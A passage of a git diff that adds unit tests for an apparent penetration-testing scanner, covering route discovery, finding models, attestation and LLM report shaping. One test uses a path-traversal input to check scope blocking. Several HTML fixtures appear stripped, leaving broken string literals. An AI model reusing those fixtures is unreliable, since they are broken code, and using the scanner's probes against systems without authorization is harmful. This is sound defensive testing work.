"example.com"}, + timeline=[], + passes=[{"pass_nr": 1, "risk_score": 10}], + ui_aggregate={"total_open_ports": [], "total_services": 0, "total_findings": 0}, + duration=1.0, + date_created=1.0, + date_completed=2.0, + ) + + payload = archive.to_dict() + restored = JobArchive.from_dict(payload) + + self.assertEqual(restored.archive_version, 1) + self.assertEqual(restored.to_dict(), payload) + + +class TestFindingContracts(unittest.TestCase): + + def test_network_probe_result_exposes_required_finding_shape(self): + finding = Finding( + severity=Severity.HIGH, + title="Weak TLS", + description="TLS config is weak", + evidence="TLS 1.0 enabled", + confidence="firm", + ) + + result = probe_result(findings=[finding]) + persisted = result["findings"][0] + + for key in ("severity", "title", "description", "evidence", "confidence"): + self.assertIn(key, persisted) + + def test_graybox_flat_finding_exposes_required_contract_fields(self): + finding = GrayboxFinding( + scenario_id="PT-A01-01", + title="IDOR", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + cwe=["CWE-639"], + evidence=["endpoint=/api/records/2", "status=200"], + ) + + flat = finding.to_flat_finding(port=443, protocol="https", probe_name="access_control") + + for key in ( + "finding_id", + "severity", + "title", + "description", + "evidence", + "confidence", + "port", + "protocol", + "probe", + "category", + "probe_type", + ): + self.assertIn(key, flat) + + +class TestAggregationContracts(unittest.TestCase): + + def test_aggregation_is_deterministic_under_worker_order_variation(self): + host = _ReportHost() + worker_a = { + "open_ports": [80], + "ports_scanned": [80], + "completed_tests": ["probe-a"], + "service_info": {"80": {"_service_info_http": {"findings": [{"title": "A"}]}}}, + } + worker_b = { + "open_ports": [443], + "ports_scanned": [443], + "completed_tests": ["probe-b"], + "service_info": {"443": {"_service_info_https": {"findings": [{"title": "B"}]}}}, + } + + first = host._get_aggregated_report({"worker-a": worker_a, "worker-b": worker_b}) + second = host._get_aggregated_report({"worker-b": worker_b, "worker-a": worker_a}) + + self.assertEqual(sorted(first["open_ports"]), sorted(second["open_ports"])) + self.assertEqual(first["service_info"], second["service_info"]) + self.assertEqual(set(first["completed_tests"]), set(second["completed_tests"])) diff --git a/extensions/business/cybersec/red_mesh/tests/test_discovery.py b/extensions/business/cybersec/red_mesh/tests/test_discovery.py new file mode 100644 index 00000000..4f2c51f1 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_discovery.py @@ -0,0 +1,228 @@ +"""Tests for DiscoveryModule.""" + +import unittest +from collections import deque +from unittest.mock import MagicMock, patch + +from extensions.business.cybersec.red_mesh.graybox.discovery import DiscoveryModule, _RouteParser +from extensions.business.cybersec.red_mesh.graybox.models.target_config import ( + GrayboxTargetConfig, DiscoveryConfig, +) +from extensions.business.cybersec.red_mesh.graybox.models import DiscoveryResult + + +def _mock_response(status=200, text="", content_type="text/html"): + resp = MagicMock() + resp.status_code = status + resp.text = text + resp.headers = {"Content-Type": content_type} + return resp + + +def _make_discovery(scope_prefix="", max_pages=50, max_depth=3, routes_html=None): + """Build a DiscoveryModule with mocked HTTP.""" + cfg = GrayboxTargetConfig( + discovery=DiscoveryConfig(scope_prefix=scope_prefix, max_pages=max_pages, max_depth=max_depth), + ) + auth = MagicMock() + safety = MagicMock() + safety.throttle = MagicMock() + + # Build mock session that returns different HTML per path + session = MagicMock() + routes_html = routes_html or {} + + def mock_get(url, **kwargs): + for path, html in routes_html.items(): + if url.endswith(path) or url == "http://testapp.local:8000" + path: + return _mock_response(text=html) + return _mock_response(text="") + + session.get.side_effect = mock_get + auth.official_session = session + auth.anon_session = session + + disc = DiscoveryModule( + target_url="http://testapp.local:8000", + auth_manager=auth, + safety=safety, + target_config=cfg, + ) + return disc + + +class TestDiscoveryModule(unittest.TestCase): + + def test_same_origin_only(self): + """External links are ignored.""" + disc = _make_discovery(routes_html={ + "/": '
    AboutEvil', + }) + routes, forms = disc.discover() + self.assertIn("/about/", routes) + # No external domain route + for r in routes: + self.assertFalse(r.startswith("http"), f"External route leaked: {r}") + + def test_scope_prefix(self): + """Only routes under prefix are discovered.""" + disc = _make_discovery( + scope_prefix="/api/", + routes_html={ + "/": 'UsersAdmin', + }, + ) + # Root "/" is outside scope but is the seed — it will be visited + # because it's the starting point. But discovered links outside scope are not followed. + routes, forms = disc.discover() + # /api/users/ should be in routes (it's in scope) + self.assertIn("/api/users/", routes) + # /admin/ should NOT be in routes (out of scope) + self.assertNotIn("/admin/", routes) + + def test_scope_prefix_traversal(self): + """Path traversal /api/../admin/ is normalized and blocked.""" + disc = _make_discovery( + scope_prefix="/api/", + routes_html={ + "/api/": 'TraversalData', + }, + ) + routes, forms = disc.discover(["/api/"]) + # /admin/secrets should be blocked (normalized from /api/../admin/secrets) + self.assertNotIn("/admin/secrets", routes) + + def test_max_pages(self): + """Stops after page limit.""" + # Create a chain of pages that would go forever + html_map = {} + for i in range(100): + html_map[f"/page/{i}/"] = f'Next' + + disc = _make_discovery(max_pages=5, routes_html=html_map) + routes, _ = disc.discover(["/page/0/"]) + # Should stop at 5 pages + self.assertLessEqual(len(routes), 5) + + def test_max_depth(self): + """Stops at depth limit.""" + disc = _make_discovery( + max_depth=1, + routes_html={ + "/": 'L1', + "/level1/": 'L2', + "/level1/level2/": 'L3', + }, + ) + routes, _ = disc.discover() + self.assertIn("/level1/", routes) + # level2 should NOT be discovered (depth 2 > max_depth 1) + self.assertNotIn("/level1/level2/", routes) + + def test_form_actions_recorded_not_followed(self): + """Forms are collected but their actions are not visited.""" + disc = _make_discovery(routes_html={ + "/": '
    About', + }) + routes, forms = disc.discover() + self.assertIn("/api/submit/", forms) + self.assertIn("/about/", routes) + + def test_discover_result_returns_typed_payload(self): + disc = _make_discovery(routes_html={ + "/": 'About
    ', + }) + result = disc.discover_result() + self.assertIsInstance(result, DiscoveryResult) + self.assertIn("/about/", result.routes) + self.assertIn("/api/submit/", result.forms) + + def test_known_routes_included(self): + """User-supplied routes are added to BFS queue.""" + disc = _make_discovery(routes_html={ + "/custom/": 'Sub', + }) + routes, _ = disc.discover(known_routes=["/custom/"]) + self.assertIn("/custom/", routes) + + def test_empty_html(self): + """Pages with no links still appear in routes.""" + disc = _make_discovery(routes_html={ + "/": 'Hello', + }) + routes, _ = disc.discover() + self.assertIn("/", routes) + self.assertEqual(len(routes), 1) + + def test_non_html_skipped(self): + """Non-HTML responses are added to routes but not parsed.""" + cfg = GrayboxTargetConfig(discovery=DiscoveryConfig()) + auth = MagicMock() + safety = MagicMock() + session = MagicMock() + + def mock_get(url, **kwargs): + if "/api/data" in url: + return _mock_response(text='{"key": "value"}', content_type="application/json") + return _mock_response(text='API') + + session.get.side_effect = mock_get + auth.official_session = session + auth.anon_session = session + + disc = DiscoveryModule("http://testapp.local:8000", auth, safety, cfg) + routes, _ = disc.discover() + self.assertIn("/api/data", routes) + + +class TestRouteParser(unittest.TestCase): + + def test_extracts_links_and_forms(self): + """Parser extracts href and form action.""" + parser = _RouteParser() + parser.feed('P1
    ') + self.assertEqual(parser.links, ["/page1/"]) + self.assertEqual(parser.forms, ["/submit/"]) + + def test_ignores_empty_href(self): + """Links without href are ignored.""" + parser = _RouteParser() + parser.feed('No href') + self.assertEqual(parser.links, []) + + +class TestNormalize(unittest.TestCase): + + def test_javascript_ignored(self): + """javascript: links return empty string.""" + disc = _make_discovery() + self.assertEqual(disc._normalize("javascript:void(0)"), "") + + def test_mailto_ignored(self): + disc = _make_discovery() + self.assertEqual(disc._normalize("mailto:a@b.com"), "") + + def test_hash_ignored(self): + disc = _make_discovery() + self.assertEqual(disc._normalize("#section"), "") + + def test_relative_path(self): + disc = _make_discovery() + result = disc._normalize("/api/users/") + self.assertEqual(result, "/api/users/") + + def test_dotdot_collapsed(self): + """.. segments are collapsed.""" + disc = _make_discovery() + result = disc._normalize("/api/../admin/") + self.assertEqual(result, "/admin/") + + def test_external_rejected(self): + """External domain links return empty.""" + disc = _make_discovery() + result = disc._normalize("https://other.com/path") + self.assertEqual(result, "") + + +if __name__ == '__main__': + unittest.main() diff --git a/extensions/business/cybersec/red_mesh/tests/test_graybox_finding.py b/extensions/business/cybersec/red_mesh/tests/test_graybox_finding.py new file mode 100644 index 00000000..a457e58f --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_graybox_finding.py @@ -0,0 +1,194 @@ +"""Tests for GrayboxFinding model.""" + +import json +import unittest + +from extensions.business.cybersec.red_mesh.graybox.findings import GrayboxEvidenceArtifact, GrayboxFinding + + +class TestGrayboxFinding(unittest.TestCase): + + def _make_finding(self, **overrides): + defaults = dict( + scenario_id="PT-A01-01", + title="IDOR on /api/records/", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + cwe=["CWE-639", "CWE-862"], + attack=["T1078"], + evidence=["endpoint=/api/records/2/", "status=200"], + replay_steps=["Login as user A", "GET /api/records/2/"], + remediation="Enforce object-level authorization.", + ) + defaults.update(overrides) + return GrayboxFinding(**defaults) + + def test_to_dict_roundtrip(self): + """to_dict() produces a JSON-safe dict.""" + f = self._make_finding() + d = f.to_dict() + self.assertIsInstance(d, dict) + # JSON serializable + serialized = json.dumps(d) + self.assertIsInstance(json.loads(serialized), dict) + # All fields present + self.assertEqual(d["scenario_id"], "PT-A01-01") + self.assertEqual(d["title"], "IDOR on /api/records/") + self.assertEqual(d["status"], "vulnerable") + self.assertEqual(d["severity"], "HIGH") + self.assertEqual(d["owasp"], "A01:2021") + self.assertEqual(d["cwe"], ["CWE-639", "CWE-862"]) + self.assertEqual(d["attack"], ["T1078"]) + + def test_to_flat_finding_vulnerable(self): + """Vulnerable status -> confidence=certain, severity preserved.""" + f = self._make_finding(status="vulnerable", severity="HIGH") + flat = f.to_flat_finding(port=443, protocol="https", probe_name="access_control") + self.assertEqual(flat["confidence"], "certain") + self.assertEqual(flat["severity"], "HIGH") + self.assertEqual(flat["probe_type"], "graybox") + self.assertEqual(flat["port"], 443) + self.assertEqual(flat["protocol"], "https") + self.assertEqual(flat["probe"], "access_control") + self.assertEqual(flat["category"], "graybox") + self.assertIn("finding_id", flat) + + def test_to_flat_finding_not_vulnerable(self): + """not_vulnerable status -> severity overridden to INFO.""" + f = self._make_finding(status="not_vulnerable", severity="HIGH") + flat = f.to_flat_finding(port=443, protocol="https", probe_name="access_control") + self.assertEqual(flat["severity"], "INFO") + self.assertEqual(flat["confidence"], "firm") + self.assertEqual(flat["status"], "not_vulnerable") + + def test_to_flat_finding_inconclusive(self): + """inconclusive status -> confidence=tentative.""" + f = self._make_finding(status="inconclusive", severity="MEDIUM") + flat = f.to_flat_finding(port=80, protocol="http", probe_name="injection") + self.assertEqual(flat["confidence"], "tentative") + self.assertEqual(flat["severity"], "MEDIUM") + + def test_evidence_joined(self): + """Evidence list is joined with '; ' in flat finding.""" + f = self._make_finding(evidence=["endpoint=/api/foo", "status=200"]) + flat = f.to_flat_finding(port=80, protocol="http", probe_name="test") + self.assertEqual(flat["evidence"], "endpoint=/api/foo; status=200") + + def test_cwe_joined(self): + """CWE list is joined with ', ' in flat finding.""" + f = self._make_finding(cwe=["CWE-639", "CWE-862"]) + flat = f.to_flat_finding(port=80, protocol="http", probe_name="test") + self.assertEqual(flat["cwe_id"], "CWE-639, CWE-862") + + def test_finding_id_deterministic(self): + """Same inputs produce the same finding_id.""" + f = self._make_finding() + flat1 = f.to_flat_finding(port=443, protocol="https", probe_name="ac") + flat2 = f.to_flat_finding(port=443, protocol="https", probe_name="ac") + self.assertEqual(flat1["finding_id"], flat2["finding_id"]) + + def test_finding_id_stable_for_equivalent_cwe_order(self): + """Equivalent CWE sets produce the same finding_id regardless of list order.""" + f1 = self._make_finding(cwe=["CWE-639", "CWE-862"]) + f2 = self._make_finding(cwe=["CWE-862", "CWE-639"]) + flat1 = f1.to_flat_finding(port=443, protocol="https", probe_name="ac") + flat2 = f2.to_flat_finding(port=443, protocol="https", probe_name="ac") + self.assertEqual(flat1["finding_id"], flat2["finding_id"]) + + def test_replay_steps_preserved(self): + """Replay steps round-trip to flat finding.""" + steps = ["Login as user A", "GET /api/records/2/"] + f = self._make_finding(replay_steps=steps) + flat = f.to_flat_finding(port=80, protocol="http", probe_name="test") + self.assertEqual(flat["replay_steps"], steps) + + def test_default_factory_lists(self): + """All list fields default to [] (not None).""" + f = GrayboxFinding( + scenario_id="PT-X", title="T", status="vulnerable", + severity="LOW", owasp="A01:2021", + ) + self.assertEqual(f.cwe, []) + self.assertEqual(f.attack, []) + self.assertEqual(f.evidence, []) + self.assertEqual(f.replay_steps, []) + + def test_attack_ids_in_flat(self): + """attack_ids field in flat finding contains MITRE IDs.""" + f = self._make_finding(attack=["T1078", "T1110"]) + flat = f.to_flat_finding(port=80, protocol="http", probe_name="test") + self.assertEqual(flat["attack_ids"], ["T1078", "T1110"]) + + def test_description_format(self): + """Description includes scenario_id and title.""" + f = self._make_finding(scenario_id="PT-A03-01", title="SQL Injection") + flat = f.to_flat_finding(port=80, protocol="http", probe_name="inj") + self.assertEqual(flat["description"], "Scenario PT-A03-01: SQL Injection") + + def test_error_field(self): + """error field is None by default, can be set.""" + f = self._make_finding() + self.assertIsNone(f.error) + f2 = self._make_finding(error="Connection refused") + self.assertEqual(f2.error, "Connection refused") + + def test_evidence_artifacts_roundtrip(self): + """Typed evidence artifacts serialize as JSON-safe dicts.""" + artifact = GrayboxEvidenceArtifact( + summary="GET /api/records/2 -> 200", + request_snapshot="GET /api/records/2", + response_snapshot='{"owner":"bob"}', + captured_at="2026-03-13T02:30:00Z", + raw_evidence_cid="QmEvidenceCID", + ) + f = self._make_finding(evidence_artifacts=[artifact]) + + payload = f.to_dict() + + self.assertEqual(payload["evidence_artifacts"][0]["summary"], "GET /api/records/2 -> 200") + self.assertEqual(payload["evidence_artifacts"][0]["raw_evidence_cid"], "QmEvidenceCID") + + def test_flat_finding_uses_artifact_summary_when_evidence_strings_absent(self): + """Artifact summaries backfill the legacy flat evidence field.""" + artifact = GrayboxEvidenceArtifact(summary="GET /admin -> 403") + f = self._make_finding(evidence=[], evidence_artifacts=[artifact]) + + flat = f.to_flat_finding(port=443, protocol="https", probe_name="access_control") + + self.assertEqual(flat["evidence"], "GET /admin -> 403") + self.assertEqual(flat["evidence_artifacts"][0]["summary"], "GET /admin -> 403") + + def test_flat_from_dict_preserves_typed_evidence_artifacts(self): + """flat_from_dict is the canonical persisted-finding normalization path.""" + payload = self._make_finding( + evidence=[], + evidence_artifacts=[{"summary": "GET /admin -> 403", "raw_evidence_cid": "Qm1"}], + ).to_dict() + + flat = GrayboxFinding.flat_from_dict(payload, port=443, protocol="https", probe_name="access_control") + + self.assertEqual(flat["evidence"], "GET /admin -> 403") + self.assertEqual(flat["evidence_artifacts"][0]["raw_evidence_cid"], "Qm1") + + def test_cvss_metadata_survives_flattening(self): + """Optional CVSS metadata survives typed graybox normalization.""" + f = self._make_finding( + cvss_score=8.8, + cvss_vector="CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + ) + + flat = f.to_flat_finding(port=443, protocol="https", probe_name="access_control") + + self.assertEqual(flat["cvss_score"], 8.8) + self.assertEqual(flat["cvss_vector"], "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H") + + def test_frozen(self): + """Finding is immutable.""" + f = self._make_finding() + with self.assertRaises(AttributeError): + f.title = "Changed" + + +if __name__ == '__main__': + unittest.main() diff --git a/extensions/business/cybersec/red_mesh/tests/test_hardening.py b/extensions/business/cybersec/red_mesh/tests/test_hardening.py new file mode 100644 index 00000000..7a4ccbe6 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_hardening.py @@ -0,0 +1,531 @@ +import json +import unittest +from collections import deque +from unittest.mock import MagicMock +import requests + +from .conftest import mock_plugin_modules + + +class TestAttestationHelpers(unittest.TestCase): + + def test_resolve_attestation_report_cid_prefers_explicit_cid(self): + from extensions.business.cybersec.red_mesh.mixins.attestation import _AttestationMixin + + result = _AttestationMixin._resolve_attestation_report_cid( + {"0xpeer1": {"report_cid": "QmWorkerCid"}}, + preferred_cid=" QmAggregatedCid ", + ) + self.assertEqual(result, "QmAggregatedCid") + + def test_resolve_attestation_report_cid_uses_single_worker_cid_as_fallback(self): + from extensions.business.cybersec.red_mesh.mixins.attestation import _AttestationMixin + + result = _AttestationMixin._resolve_attestation_report_cid( + {"0xpeer1": {"report_cid": "QmWorkerCid"}}, + ) + self.assertEqual(result, "QmWorkerCid") + + def test_submit_test_attestation_uses_explicit_report_cid(self): + from extensions.business.cybersec.red_mesh.mixins.attestation import _AttestationMixin + + class MockHost(_AttestationMixin): + REDMESH_ATTESTATION_DOMAIN = "0x" + ("11" * 32) + + def __init__(self): + self.cfg_attestation = {"ENABLED": True, "PRIVATE_KEY": "0xprivate", "RETRIES": 2} + self.ee_addr = "0xlauncher" + self.bc = MagicMock() + self.bc.eth_address = "0xsender" + self.bc.submit_attestation.return_value = "0xtxhash" + + def P(self, *_args, **_kwargs): + return None + + host = MockHost() + result = host._submit_redmesh_test_attestation( + job_id="jobid123", + job_specs={"target": "https://app.example.com", "run_mode": "SINGLEPASS"}, + workers={"0xlauncher": {"report_cid": "QmWorkerCid"}}, + vulnerability_score=7, + node_ips=["10.0.0.10"], + report_cid="QmAggregatedCid", + ) + + self.assertEqual(result["report_cid"], "QmAggregatedCid") + submit_kwargs = host.bc.submit_attestation.call_args.kwargs + self.assertEqual( + submit_kwargs["function_args"][-1], + host._attestation_pack_cid_obfuscated("QmAggregatedCid"), + ) + + def test_submit_test_attestation_retries_transient_failure(self): + from extensions.business.cybersec.red_mesh.mixins.attestation import _AttestationMixin + + class MockHost(_AttestationMixin): + REDMESH_ATTESTATION_DOMAIN = "0x" + ("11" * 32) + + def __init__(self): + self.cfg_attestation = {"ENABLED": True, "PRIVATE_KEY": "0xprivate", "RETRIES": 2} + self.ee_addr = "0xlauncher" + self.bc = MagicMock() + self.bc.eth_address = "0xsender" + self.bc.submit_attestation.side_effect = [RuntimeError("temporary"), "0xtxhash"] + + def P(self, *_args, **_kwargs): + return None + + host = MockHost() + result = host._submit_redmesh_test_attestation( + job_id="jobid123", + job_specs={"target": "https://app.example.com", "run_mode": "SINGLEPASS"}, + workers={"0xlauncher": {"report_cid": "QmWorkerCid"}}, + vulnerability_score=7, + node_ips=["10.0.0.10"], + report_cid="QmAggregatedCid", + ) + + self.assertEqual(result["tx_hash"], "0xtxhash") + self.assertEqual(host.bc.submit_attestation.call_count, 2) + + +class TestLlmRetryHardening(unittest.TestCase): + + def test_build_llm_analysis_payload_network_is_compact_and_structured(self): + from extensions.business.cybersec.red_mesh.mixins.llm_agent import _RedMeshLlmAgentMixin + + class MockHost(_RedMeshLlmAgentMixin): + def __init__(self): + self.cfg_llm_agent = {"ENABLED": True, "TIMEOUT": 5, "AUTO_ANALYSIS_TYPE": "security_assessment"} + self.cfg_llm_agent_api_host = "127.0.0.1" + self.cfg_llm_agent_api_port = 8080 + + host = MockHost() + aggregated_report = { + "nr_open_ports": 2, + "ports_scanned": 100, + "open_ports": [22, 443], + "scan_metrics": {"total_duration": 45.0}, + "service_info": { + "22": { + "port": 22, + "protocol": "ssh", + "service": "ssh", + "product": "OpenSSH", + "version": "9.6", + "banner": "SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.15", + "findings": [{ + "severity": "HIGH", + "title": "SSH weak key exchange", + "evidence": "Weak KEX offered: diffie-hellman-group14-sha1", + "port": 22, + "protocol": "ssh", + }], + }, + }, + "correlation_findings": [{ + "severity": "CRITICAL", + "title": "Redis unauthenticated access", + "evidence": "Response: +PONG", + "port": 6379, + "protocol": "redis", + }], + "port_banners": {"22": "x" * 5000}, + "worker_activity": [{"id": "node-a", "start_port": 1, "end_port": 5000, "open_ports": [22, 443]}], + } + job_config = {"target": "10.0.0.1", "scan_type": "network", "run_mode": "SINGLEPASS", "start_port": 1, "end_port": 8000} + + payload = host._build_llm_analysis_payload("job-1", aggregated_report, job_config, "security_assessment") + + self.assertIn("metadata", payload) + self.assertIn("services", payload) + self.assertIn("top_findings", payload) + self.assertIn("findings_summary", payload) + self.assertNotIn("port_banners", payload) + self.assertEqual(payload["metadata"]["job_id"], "job-1") + self.assertEqual(payload["findings_summary"]["total_findings"], 2) + + def test_run_aggregated_llm_analysis_uses_shaped_payload(self): + from extensions.business.cybersec.red_mesh.mixins.llm_agent import _RedMeshLlmAgentMixin + + class MockHost(_RedMeshLlmAgentMixin): + def __init__(self): + self.cfg_llm_agent = {"ENABLED": True, "TIMEOUT": 5, "AUTO_ANALYSIS_TYPE": "security_assessment"} + self.cfg_llm_agent_api_host = "127.0.0.1" + self.cfg_llm_agent_api_port = 8080 + self.captured = None + + def P(self, *_args, **_kwargs): + return None + + def Pd(self, *_args, **_kwargs): + return None + + def _auto_analyze_report(self, job_id, report, target, scan_type="network", analysis_type=None): + self.captured = report + return {"content": "ok"} + + host = MockHost() + aggregated_report = { + "nr_open_ports": 1, + "ports_scanned": 10, + "open_ports": [22], + "service_info": {"22": {"port": 22, "protocol": "ssh", "service": "ssh", "findings": []}}, + "port_banners": {"22": "y" * 2000}, + } + job_config = {"target": "10.0.0.1", "scan_type": "network", "run_mode": "SINGLEPASS", "start_port": 1, "end_port": 100} + + result = host._run_aggregated_llm_analysis("job-1", aggregated_report, job_config) + + self.assertEqual(result, "ok") + self.assertIsNotNone(host.captured) + self.assertIn("metadata", host.captured) + self.assertNotIn("port_banners", host.captured) + self.assertEqual(host._last_llm_payload_stats["analysis_type"], "security_assessment") + self.assertGreater(host._last_llm_payload_stats["raw_bytes"], host._last_llm_payload_stats["shaped_bytes"]) + self.assertGreater(host._last_llm_payload_stats["reduction_bytes"], 0) + + def test_build_llm_analysis_payload_deduplicates_and_tracks_truncation(self): + from extensions.business.cybersec.red_mesh.mixins.llm_agent import _RedMeshLlmAgentMixin + + class MockHost(_RedMeshLlmAgentMixin): + def __init__(self): + self.cfg_llm_agent = {"ENABLED": True, "TIMEOUT": 5, "AUTO_ANALYSIS_TYPE": "security_assessment"} + self.cfg_llm_agent_api_host = "127.0.0.1" + self.cfg_llm_agent_api_port = 8080 + + host = MockHost() + aggregated_report = { + "nr_open_ports": 3, + "ports_scanned": 200, + "open_ports": [22, 80, 443], + "service_info": { + "22": { + "port": 22, + "protocol": "ssh", + "service": "ssh", + "findings": [ + { + "severity": "HIGH", + "title": "SSH weak key exchange", + "evidence": "Weak KEX offered: diffie-hellman-group14-sha1", + "port": 22, + "protocol": "ssh", + }, + { + "severity": "HIGH", + "title": "SSH weak key exchange", + "evidence": "Duplicate evidence should be collapsed", + "port": 22, + "protocol": "ssh", + }, + ], + }, + }, + "correlation_findings": [ + { + "severity": "CRITICAL", + "title": f"Critical issue {idx}", + "evidence": "x" * 1000, + "port": 443, + "protocol": "tcp", + } + for idx in range(20) + ], + "worker_activity": [{"id": "node-a", "start_port": 1, "end_port": 5000, "open_ports": [22, 80, 443]}], + } + job_config = {"target": "10.0.0.1", "scan_type": "network", "run_mode": "SINGLEPASS", "start_port": 1, "end_port": 8000} + + payload = host._build_llm_analysis_payload("job-2", aggregated_report, job_config, "security_assessment") + + self.assertLessEqual(len(payload["top_findings"]), 40) + self.assertEqual(payload["findings_summary"]["total_findings"], 21) + self.assertEqual(payload["truncation"]["deduplicated_findings"], 21) + self.assertEqual(payload["truncation"]["included_by_severity"]["CRITICAL"], 16) + self.assertGreater(payload["truncation"]["truncated_findings_count"], 0) + self.assertTrue(all(len(finding["evidence"]) <= 220 for finding in payload["top_findings"])) + + def test_quick_summary_payload_is_smaller_than_security_assessment(self): + from extensions.business.cybersec.red_mesh.mixins.llm_agent import _RedMeshLlmAgentMixin + + class MockHost(_RedMeshLlmAgentMixin): + def __init__(self): + self.cfg_llm_agent = {"ENABLED": True, "TIMEOUT": 5, "AUTO_ANALYSIS_TYPE": "security_assessment"} + self.cfg_llm_agent_api_host = "127.0.0.1" + self.cfg_llm_agent_api_port = 8080 + + host = MockHost() + aggregated_report = { + "nr_open_ports": 50, + "ports_scanned": 1000, + "open_ports": list(range(1, 51)), + "service_info": { + str(port): { + "port": port, + "protocol": "tcp", + "service": f"svc-{port}", + "findings": [{ + "severity": "HIGH" if port % 2 == 0 else "MEDIUM", + "title": f"Finding {port}", + "evidence": "e" * 400, + "port": port, + "protocol": "tcp", + }], + } + for port in range(1, 31) + }, + "worker_activity": [{"id": "node-a", "start_port": 1, "end_port": 1000, "open_ports": list(range(1, 51))}], + } + job_config = {"target": "10.0.0.2", "scan_type": "network", "run_mode": "SINGLEPASS", "start_port": 1, "end_port": 1000} + + security_payload = host._build_llm_analysis_payload("job-sec", aggregated_report, job_config, "security_assessment") + quick_payload = host._build_llm_analysis_payload("job-quick", aggregated_report, job_config, "quick_summary") + + self.assertGreater(len(security_payload["services"]), len(quick_payload["services"])) + self.assertGreater(len(security_payload["top_findings"]), len(quick_payload["top_findings"])) + self.assertGreater( + len(security_payload["coverage"]["open_ports_sample"]), + len(quick_payload["coverage"]["open_ports_sample"]), + ) + self.assertEqual(quick_payload["truncation"]["service_limit"], 12) + self.assertEqual(quick_payload["truncation"]["finding_limit"], 12) + + def test_record_llm_payload_stats_tracks_size_reduction(self): + from extensions.business.cybersec.red_mesh.mixins.llm_agent import _RedMeshLlmAgentMixin + + class MockHost(_RedMeshLlmAgentMixin): + def __init__(self): + self.cfg_llm_agent = {"ENABLED": True, "TIMEOUT": 5, "AUTO_ANALYSIS_TYPE": "security_assessment"} + self.cfg_llm_agent_api_host = "127.0.0.1" + self.cfg_llm_agent_api_port = 8080 + + def Pd(self, *_args, **_kwargs): + return None + + host = MockHost() + raw_report = {"service_info": {"80": {"banner": "x" * 3000}}, "port_banners": {"80": "y" * 4000}} + shaped = {"metadata": {"job_id": "job-obs"}, "truncation": {"finding_limit": 12}} + + stats = host._record_llm_payload_stats("job-obs", "quick_summary", raw_report, shaped) + + self.assertEqual(stats["analysis_type"], "quick_summary") + self.assertGreater(stats["raw_bytes"], stats["shaped_bytes"]) + self.assertGreater(stats["reduction_ratio"], 0) + self.assertEqual(host._last_llm_payload_stats["job_id"], "job-obs") + + def test_extract_report_findings_includes_graybox_results(self): + from extensions.business.cybersec.red_mesh.mixins.llm_agent import _RedMeshLlmAgentMixin + + class MockHost(_RedMeshLlmAgentMixin): + def __init__(self): + self.cfg_llm_agent = {"ENABLED": True, "TIMEOUT": 5, "AUTO_ANALYSIS_TYPE": "security_assessment"} + self.cfg_llm_agent_api_host = "127.0.0.1" + self.cfg_llm_agent_api_port = 8080 + + host = MockHost() + findings = host._extract_report_findings({ + "graybox_results": { + "443": { + "_graybox_authz": { + "findings": [{"scenario_id": "S-1", "title": "IDOR", "severity": "HIGH", "status": "vulnerable"}], + }, + }, + }, + }) + + self.assertEqual(len(findings), 1) + self.assertEqual(findings[0]["scenario_id"], "S-1") + + def test_build_llm_analysis_payload_webapp_is_compact_and_structured(self): + from extensions.business.cybersec.red_mesh.mixins.llm_agent import _RedMeshLlmAgentMixin + + class MockHost(_RedMeshLlmAgentMixin): + def __init__(self): + self.cfg_llm_agent = {"ENABLED": True, "TIMEOUT": 5, "AUTO_ANALYSIS_TYPE": "security_assessment"} + self.cfg_llm_agent_api_host = "127.0.0.1" + self.cfg_llm_agent_api_port = 8080 + + host = MockHost() + aggregated_report = { + "scan_metrics": {"scenarios_total": 3, "scenarios_vulnerable": 1}, + "scenario_stats": {"vulnerable": 1, "not_vulnerable": 1, "inconclusive": 1}, + "service_info": { + "443": { + "_graybox_discovery": { + "routes": ["/login", "/admin", "/login"], + "forms": [ + {"action": "/login", "method": "post"}, + {"action": "/admin", "method": "post"}, + ], + }, + }, + }, + "graybox_results": { + "443": { + "_graybox_authz": { + "findings": [ + { + "scenario_id": "PT-A01-01", + "title": "IDOR on records endpoint", + "status": "vulnerable", + "severity": "HIGH", + "owasp_id": "A01:2021", + "evidence": "GET /api/records/2 returned 200 for regular user", + }, + { + "scenario_id": "PT-A01-01", + "title": "IDOR on records endpoint", + "status": "vulnerable", + "severity": "HIGH", + "owasp_id": "A01:2021", + "evidence": "Duplicate evidence should be collapsed", + }, + ], + }, + }, + }, + "web_tests_info": { + "443": { + "_web_test_xss": { + "findings": [ + { + "scenario_id": "PT-A03-02", + "title": "Reflected XSS in search", + "status": "inconclusive", + "severity": "MEDIUM", + "owasp_id": "A03:2021", + "evidence": "Payload reflected in response body", + }, + ], + }, + }, + }, + "completed_tests": ["graybox_discovery", "_graybox_authz", "_web_test_xss"], + } + job_config = { + "target_url": "https://app.example.test", + "scan_type": "webapp", + "run_mode": "SINGLEPASS", + "app_routes": ["/seeded-route"], + "excluded_features": ["_graybox_stateful"], + } + + payload = host._build_llm_analysis_payload("job-web", aggregated_report, job_config, "security_assessment") + + self.assertEqual(payload["metadata"]["scan_type"], "webapp") + self.assertIn("probe_summary", payload) + self.assertIn("coverage", payload) + self.assertIn("attack_surface", payload) + self.assertNotIn("graybox_results", payload) + self.assertEqual(payload["findings_summary"]["total_findings"], 2) + self.assertEqual(payload["findings_summary"]["by_status"]["vulnerable"], 1) + self.assertEqual(payload["coverage"]["routes"]["total_routes"], 3) + self.assertEqual(payload["probe_summary"]["top_probes"][0]["probe"], "_graybox_authz") + + def test_call_llm_agent_api_retries_transient_connection_error(self): + from extensions.business.cybersec.red_mesh.mixins.llm_agent import _RedMeshLlmAgentMixin + + class MockHost(_RedMeshLlmAgentMixin): + def __init__(self): + self.cfg_llm_agent = {"ENABLED": True, "TIMEOUT": 5, "AUTO_ANALYSIS_TYPE": "security_assessment"} + self.cfg_llm_agent_api_host = "127.0.0.1" + self.cfg_llm_agent_api_port = 8080 + self.cfg_llm_api_retries = 2 + + def P(self, *_args, **_kwargs): + return None + + def Pd(self, *_args, **_kwargs): + return None + + class Response: + status_code = 200 + + @staticmethod + def json(): + return {"analysis": "ok"} + + host = MockHost() + original_post = requests.post + calls = 